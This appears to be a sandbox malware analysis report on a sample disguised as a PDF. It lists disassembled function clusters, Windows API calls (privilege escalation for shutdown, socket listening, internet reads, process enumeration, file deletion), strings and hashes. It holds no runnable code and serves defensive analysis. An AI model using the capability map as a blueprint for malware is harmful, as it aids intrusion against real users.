                                                                                                                      • Instruction Fuzzy Hash: A54189245047C96EFF319A64980C3EBBEE07F12344F08819ED5C6471C2EB9C99D887E2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ERCP$Oav$VUUU$VUUU$VUUU$VUUU$rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
                                                                                                                      • API String ID: 0-1081084498
                                                                                                                      • Opcode ID: 5551812bcb78d9286c6ecc8ed4f17cc45c837f8a68f6f40cfc462463aae5d3e4
                                                                                                                      • Instruction ID: 751189f1d55a18b52620cdb9cfa777c93c94004bf4cae83b58298671f19d2e69
                                                                                                                      • Opcode Fuzzy Hash: 5551812bcb78d9286c6ecc8ed4f17cc45c837f8a68f6f40cfc462463aae5d3e4
                                                                                                                      • Instruction Fuzzy Hash: 2CA27E70E0421ACBDF28CF58D9907AEB7B1FF55314F2481AADC56A7280E7389E85CB51
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1737998785-0
                                                                                                                      • Opcode ID: 8670d9f05b5076017d1a4c584bcc2d93491529cc37e1e36bfa14418de6188106
                                                                                                                      • Instruction ID: e4b13d0acad2b43d6472882270cdd3f796446cc3fa7c4ea39129f13053ce8c42
                                                                                                                      • Opcode Fuzzy Hash: 8670d9f05b5076017d1a4c584bcc2d93491529cc37e1e36bfa14418de6188106
                                                                                                                      • Instruction Fuzzy Hash: 01215A35201210DFDB10AF64EC19FA97BA8EF54711F14C02AF946DB2A1DB79E911CB98
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007548A1,?,?,007537C0,?), ref: 007548CE
                                                                                                                        • Part of subcall function 007B4CD3: GetFileAttributesW.KERNEL32(?,007B3947), ref: 007B4CD4
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 007B3ADF
                                                                                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 007B3B87
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 007B3B9A
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 007B3BB7
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 007B3BD9
                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 007B3BF5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 4002782344-1173974218
                                                                                                                      • Opcode ID: a7533f5ea6ebdf521b8f99cca63e72745c89a3927051008ddd3b609274796f1e
                                                                                                                      • Instruction ID: d59df1d303ff8287c89f1cc7ae3c2417376dc5d6eb4abb93728a34dbddfb85d6
                                                                                                                      • Opcode Fuzzy Hash: a7533f5ea6ebdf521b8f99cca63e72745c89a3927051008ddd3b609274796f1e
                                                                                                                      • Instruction Fuzzy Hash: BE51843180114CDACF15EBA0DD96AEEB779AF14301F6481A9E84277095EF786F4DCB60
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007BF6AB
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 007BF6DB
                                                                                                                      • _wcscmp.LIBCMT ref: 007BF6EF
                                                                                                                      • _wcscmp.LIBCMT ref: 007BF70A
                                                                                                                      • FindNextFileW.KERNEL32(?,?), ref: 007BF7A8
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 007BF7BE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 713712311-438819550
                                                                                                                      • Opcode ID: 2b17f7643f318044a33eb1cbf40aba8e83fabf7d843c068d3dd0e9ad41440df4
                                                                                                                      • Instruction ID: 6a1eeff9e22e7230752f429604ede2883f35007aa7f224377cc4a0972c51421d
                                                                                                                      • Opcode Fuzzy Hash: 2b17f7643f318044a33eb1cbf40aba8e83fabf7d843c068d3dd0e9ad41440df4
                                                                                                                      • Instruction Fuzzy Hash: E141707190020AEFCF15DF64CC89BEEBBB4FF05710F5485A6E815A2291DB389E44CB90
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: e0b1b7f427ffe5912b7b0c69015542bf59e3b3f81acc67fae86f4e6eff447806
• Instruction ID: df4e14fdc6165f643afb969a555d05934ab19062105f9e9f75421fdec3502098
• Opcode Fuzzy Hash: e0b1b7f427ffe5912b7b0c69015542bf59e3b3f81acc67fae86f4e6eff447806
• Instruction Fuzzy Hash: 26127970A00609DFDF14DFA4D985AEEB7B5FF48300F108669E806E7251EB39AD25DB90
APIs
  • Part of subcall function 00770FF6: std::exception::exception.LIBCMT ref: 0077102C
  • Part of subcall function 00770FF6: __CxxThrowException@8.LIBCMT ref: 00771041
• _memmove.LIBCMT ref: 007A062F
• _memmove.LIBCMT ref: 007A0744
• _memmove.LIBCMT ref: 007A07EB
Strings
Similarity
• API ID: _memmove$Exception@8Throwstd::exception::exception
• String ID: yZv
• API String ID: 1300846289-1565780762
• Opcode ID: e4994f5e24690d934151f46046f60675ab8021ddbfb22d6fc68ec965a1c6ea78
• Instruction ID: 50f021594ebd9977403c1c43426a720cdca0727113be739d7ec79616d74666f8
• Opcode Fuzzy Hash: e4994f5e24690d934151f46046f60675ab8021ddbfb22d6fc68ec965a1c6ea78
• Instruction Fuzzy Hash: F402BFB0E00209DFDF04DF64D985AAE7BB5FF84340F148469E80ADB255EB39DA64CB91
APIs
  • Part of subcall function 007A8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007A8D0D
  • Part of subcall function 007A8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007A8D3A
  • Part of subcall function 007A8CC3: GetLastError.KERNEL32 ref: 007A8D47
• ExitWindowsEx.USER32(?,00000000), ref: 007B549B
Strings
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• API String ID: 2234035333-194228
• Opcode ID: 1d3089f37d52cc56ba0a56c499991fc5bc2abd7b7ddb56ace7c87eb1e016d63f
• Instruction ID: 8a3f8e87136803f1d8bf37fe205476280293b7f34bb68a97f18c738504cd8b5b
• Opcode Fuzzy Hash: 1d3089f37d52cc56ba0a56c499991fc5bc2abd7b7ddb56ace7c87eb1e016d63f
• Instruction Fuzzy Hash: 4B01F231655B556AE7A86678EC4ABFA7368EB05352F244521FD07D20D2DABC1C8081A4
Strings
Similarity
• API ID: __itow__swprintf
• String ID: Oav
• API String ID: 674341424-1091017984
• Opcode ID: 2958ad609cea23eb6a58ac253b33684ac7b01b9a03202d45386efe12324745d7
• Instruction ID: 57a7fa2da17895025f2d513c3776cae149944a018325cdfad9129dd3725b183c
• Opcode Fuzzy Hash: 2958ad609cea23eb6a58ac253b33684ac7b01b9a03202d45386efe12324745d7
• Instruction Fuzzy Hash: 49229B71518341DFCB24DF24C895BABB7E4BF84300F14891DF99A97292DB79EA04CB92
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007C65EF
• WSAGetLastError.WSOCK32(00000000), ref: 007C65FE
• bind.WSOCK32(00000000,?,00000010), ref: 007C661A
• listen.WSOCK32(00000000,00000005), ref: 007C6629
• WSAGetLastError.WSOCK32(00000000), ref: 007C6643
• closesocket.WSOCK32(00000000,00000000), ref: 007C6657
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
• API String ID: 1279440585-0
• Opcode ID: 2b04588a6a7bd3014bf12212ee431957e3aeebf6f0d982baaea6034bd72af8bf
• Instruction ID: 6d6a61f396ebcd0c547127826dce0cc9c34c753f5c5190042225c8b32ad0bb97
• Opcode Fuzzy Hash: 2b04588a6a7bd3014bf12212ee431957e3aeebf6f0d982baaea6034bd72af8bf
• Instruction Fuzzy Hash: 18218B30200204DFCB10EF24C889FAEB7F9EF49320F14816EE956A7291CB78AD05DB65
APIs
  • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
• DefDlgProcW.USER32(?,?,?,?,?), ref: 007519FA
• GetSysColor.USER32(0000000F), ref: 00751A4E
• SetBkColor.GDI32(?,00000000), ref: 00751A61
  • Part of subcall function 00751290: DefDlgProcW.USER32(?,00000020,?), ref: 007512D8
Similarity
• API ID: ColorProc$LongWindow
• String ID:
• API String ID: 3744519093-0
• Opcode ID: 19ae066b0960474be101156ad8b135b68d63efe0b0dce815b0732e97c74344b0
• Instruction ID: acb3d0601a60a2b74a54d3bb3ce294ddfd2ef1325fb99ce9d30a714e699cb773
• Opcode Fuzzy Hash: 19ae066b0960474be101156ad8b135b68d63efe0b0dce815b0732e97c74344b0
• Instruction Fuzzy Hash: 1BA13AB5105585FAD63AAB384C48FFF266DEF42343B94811AFC02D5191DB9C9D09D3B1
APIs
  • Part of subcall function 007C80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007C80CB
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 007C6AB1
• WSAGetLastError.WSOCK32(00000000), ref: 007C6ADA
• bind.WSOCK32(00000000,?,00000010), ref: 007C6B13
• WSAGetLastError.WSOCK32(00000000), ref: 007C6B20
• closesocket.WSOCK32(00000000,00000000), ref: 007C6B34
Similarity
• API ID: ErrorLast$bindclosesocketinet_addrsocket
• String ID:
• API String ID: 99427753-0
• Opcode ID: b786e41a9fc26017a289cbc9acf8c3f1c192e1790ad33ac598cce524f5bd7cba
• Instruction ID: 98fcaa2746c974047a60a28ae06902964790f909d2bbae0dfce9636876ad8b5b
• Opcode Fuzzy Hash: b786e41a9fc26017a289cbc9acf8c3f1c192e1790ad33ac598cce524f5bd7cba
• Instruction Fuzzy Hash: 0141A575600214EFEB10AF24DC8AFAE77A99B44710F44C05DFE16AB2D2DBB89D048791
APIs
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: 223dd148b85ec6481f7de753d28ec9baca01fb8dbad0c83f7fefc7eca6b0ec46
• Instruction ID: e2bc76f86731d1cf3b2bc67a20640f746a09cf094048fc326f3ad197f3d52f68
• Opcode Fuzzy Hash: 223dd148b85ec6481f7de753d28ec9baca01fb8dbad0c83f7fefc7eca6b0ec46
• Instruction Fuzzy Hash: 6411C431301910AFE7211F26DC48A6F7BB8EF84B21B84802AF847D7341CB7CD901CAA9
APIs
• CoInitialize.OLE32(00000000), ref: 007BC69D
• CoCreateInstance.OLE32(007E2D6C,00000000,00000001,007E2BDC,?), ref: 007BC6B5
  • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
• CoUninitialize.OLE32 ref: 007BC922
Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 2683427295-24824748
                                                                                                                      • Opcode ID: 8eec1f558bfbd44ce9b7fa0db60937ee284fcf8581d0b91aa36c60c2ff4b5562
                                                                                                                      • Instruction ID: 473ea80f754532bdc0f0506d7a9733732768e2b5843d4479dce6ed7567770c02
                                                                                                                      • Opcode Fuzzy Hash: 8eec1f558bfbd44ce9b7fa0db60937ee284fcf8581d0b91aa36c60c2ff4b5562
                                                                                                                      • Instruction Fuzzy Hash: 40A15D71504205EFD700EF64C895EABB7ECEF84305F04891CF556971A2DBB5EA09CB62
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00791D88,?), ref: 007CC312
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007CC324
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                      • API String ID: 2574300362-1816364905
                                                                                                                      • Opcode ID: 6d55d36cf94b693c40e6710bfdef06eeb85b1f673871512dfc830c66761cb149
                                                                                                                      • Instruction ID: 2e9d1c64d641eee1052c180f42ffaa371c90818b8e76388734a484ebfadae886
                                                                                                                      • Opcode Fuzzy Hash: 6d55d36cf94b693c40e6710bfdef06eeb85b1f673871512dfc830c66761cb149
                                                                                                                      • Instruction Fuzzy Hash: 09E0ECB4601713CFDB225B35E804F4677E4EB08755B84C47EE89AD2250E77CD881CB61
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 007CF151
                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 007CF15F
                                                                                                                        • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 007CF21F
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 007CF22E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2576544623-0
                                                                                                                      • Opcode ID: 99d21e8bcf641913aac1fb4092ab7cd4feeebd66031074687fedca2a7f1cb966
                                                                                                                      • Instruction ID: a1fa167148d989da15905c6f2b473a3514b69079077bf3d1728d38498595b431
                                                                                                                      • Opcode Fuzzy Hash: 99d21e8bcf641913aac1fb4092ab7cd4feeebd66031074687fedca2a7f1cb966
                                                                                                                      • Instruction Fuzzy Hash: 34513C71504311DFD310EF24DC89EABBBE8FF94710F14492DF99696291EB749908CB92
                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007AEB19
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrlen
                                                                                                                      • String ID: ($|
                                                                                                                      • API String ID: 1659193697-1631851259
                                                                                                                      • Opcode ID: 543bb90626b4edd348ba2b12403d65cd41e1d218a7a5a4d93577397e879e3f5a
                                                                                                                      • Instruction ID: 7341c480fe1ddf019cc1fb4258e0cd81f2709f9a2dbc16ac4d4081ff033745c4
                                                                                                                      • Opcode Fuzzy Hash: 543bb90626b4edd348ba2b12403d65cd41e1d218a7a5a4d93577397e879e3f5a
                                                                                                                      • Instruction Fuzzy Hash: 58323675A00605DFDB28CF59C485A6AB7F1FF88320B11C56EE89ACB3A1E774E941CB50
                                                                                                                      APIs
                                                                                                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007C1AFE,00000000), ref: 007C26D5
                                                                                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007C270C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 599397726-0
                                                                                                                      • Opcode ID: 943f2455e4ed0ba69d7cfaa02959cc2e1ab2fe843fca21f760c722f3b83b4a17
                                                                                                                      • Instruction ID: 88a10474747bef47294e1f4a1bac8b979df6790a75568064533e679a7309e319
                                                                                                                      • Opcode Fuzzy Hash: 943f2455e4ed0ba69d7cfaa02959cc2e1ab2fe843fca21f760c722f3b83b4a17
                                                                                                                      • Instruction Fuzzy Hash: EC41C471600209FFEB20DA94DCC5FBBB7BCEB40764F10806EF605A6542EA799E429764
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 007BB5AE
                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007BB608
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 007BB655
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1682464887-0
                                                                                                                      • Opcode ID: d8bb8f95bb03697098da74cf05f40e89bec498ca26601cc41b134fa57d0448f0
                                                                                                                      • Instruction ID: 60243b7accaf0c5e9306780db069e15e9d256d98f5dbaf121a092f5ec1660ed9
                                                                                                                      • Opcode Fuzzy Hash: d8bb8f95bb03697098da74cf05f40e89bec498ca26601cc41b134fa57d0448f0
                                                                                                                      • Instruction Fuzzy Hash: 34217135A00118EFCB00EF65D884EEDBBB8FF48315F1480AAE906EB351DB35A915CB55
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00770FF6: std::exception::exception.LIBCMT ref: 0077102C
                                                                                                                        • Part of subcall function 00770FF6: __CxxThrowException@8.LIBCMT ref: 00771041
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007A8D0D
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007A8D3A
                                                                                                                      • GetLastError.KERNEL32 ref: 007A8D47
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1922334811-0
                                                                                                                      • Opcode ID: efc51609571eabc7bcae1f3897062b64d9e2983334b9741f208f3cd3a888094c
                                                                                                                      • Instruction ID: 21c4eef9fffebec6ec1f93d6c9c820740115db1d508ddfbe20a5d2ec17d809a7
                                                                                                                      • Opcode Fuzzy Hash: efc51609571eabc7bcae1f3897062b64d9e2983334b9741f208f3cd3a888094c
                                                                                                                      • Instruction Fuzzy Hash: 20118FB1514209AFD728AF54DC89D6BB7F8EB44750B24C62EF45693241EB34BC408A64
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007B404B
                                                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 007B4088
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007B4091
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 33631002-0
                                                                                                                      • Opcode ID: 9ba6f1eec7e05a5a646e67da6fcdf66bc319d4a04c69acd607943e3bd421a6cc
                                                                                                                      • Instruction ID: e1e29e00bd50071bd305efb62c25eb8d26e5a39d7312f4e197740e7a71c7f5a1
                                                                                                                      • Opcode Fuzzy Hash: 9ba6f1eec7e05a5a646e67da6fcdf66bc319d4a04c69acd607943e3bd421a6cc
                                                                                                                      • Instruction Fuzzy Hash: C91170B2901228BEE7109BE8DC44FAFBBBCEB08710F004656FA05E7191C2785A0487A1
                                                                                                                      APIs
                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007B4C2C
                                                                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007B4C43
